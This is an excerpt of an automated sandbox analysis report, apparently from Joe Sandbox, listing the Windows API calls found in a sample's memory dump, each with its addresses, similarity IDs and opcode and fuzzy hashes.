                                                                                • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                • Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                              • SendNotifyMessageA.USER32(00010432,00000496,00002711,-00000001), ref: 0047CBF2
                                                                              Similarity
                                                                              • API ID: A480A570EnumFontsMessageNotifySend
                                                                              • String ID:
                                                                              • API String ID: 2685184028-0
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              APIs
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                              • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                              Similarity
                                                                              • API ID: CloseEnum
                                                                              • String ID:
                                                                              • API String ID: 2818636725-0
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                              • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                              Similarity
                                                                              • API ID: AllocDecompressInitVirtualZ2_bz
                                                                              • String ID:
                                                                              • API String ID: 3582128297-0
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                              Similarity
                                                                              • API ID: Resource$FindFree
                                                                              • String ID:
                                                                              • API String ID: 4097029671-0
                                                                              APIs
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                              Similarity
                                                                              • API ID: ErrorFileLastMove
                                                                              • String ID:
                                                                              • API String ID: 55378915-0
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
• Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
• Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
• GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
• Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
• Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
• GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
Similarity
• API ID: AttributesErrorFileLast
• String ID:
• API String ID: 1799206407-0
• Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
• Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
• Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
• Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
APIs
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
Strings
• bzlib: Too much memory requested, xrefs: 0045D021
Similarity
• API ID: AllocVirtual
• String ID: bzlib: Too much memory requested
• API String ID: 4275171209-1500031545
• Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
• Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
• Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
• Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423259
• LoadCursorA.USER32(00000000,00000000), ref: 00423283
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
• Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
• Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
• LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
• Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
• Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
• Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
• GetClassInfoA.USER32(00000000,?,?), ref: 00416301
Similarity
• API ID: ClassInfo
• String ID:
• API String ID: 3534257612-0
• Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
• Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
• Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
• Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
  • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
• Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
• Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
• Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
APIs
Similarity
• API ID: Global$AllocLock
• String ID:
• API String ID: 15508794-0
• Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
• Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
• Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
• Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
• Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
• Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
• Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
• Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
• Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
• Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoScroll
                                                                              • String ID:
                                                                              • API String ID: 629608716-0
                                                                              • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                              • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                              • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                              • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                              APIs
                                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                              • String ID:
                                                                              • API String ID: 390483697-0
                                                                              • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                              • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                              • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                              • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                              • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                              APIs
                                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                              • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                              • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                              • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                              • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                              • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                              • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                              • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                              • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                              • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                              • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                              • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                              • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                              • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                              • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                              APIs
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                              • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                              • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                              • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                              APIs
                                                                              • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind
                                                                              • String ID:
                                                                              • API String ID: 1863332320-0
                                                                              • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                              • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                              • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                              • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
APIs
• KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
APIs
  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
• ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242EC
APIs
